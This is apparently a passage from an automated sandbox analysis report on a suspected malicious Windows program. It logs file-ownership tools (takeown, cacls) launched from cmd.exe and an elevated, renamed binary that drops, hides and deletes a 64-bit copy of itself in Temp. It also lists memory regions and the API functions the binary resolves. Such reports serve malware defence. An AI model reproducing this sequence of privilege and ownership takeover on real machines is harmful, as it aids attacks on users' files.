| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xfbc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x5dc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Memo.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Memo.jtp" |
|
1 |
Process #120: vidhs3md.exe
179
0
| Information | Value |
|---|---|
| ID | #120 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "WinMail.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:44, Reason: Child Process |
| Unmonitor | End Time: 00:04:54, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x904 |
| Parent PID | 0xedc (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E98
0x
B48
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00320000 | 0x003ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00580000 | 0x005a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00887fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x01e1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x743b0000 | 0x74441fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | os_pid = 0x834, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
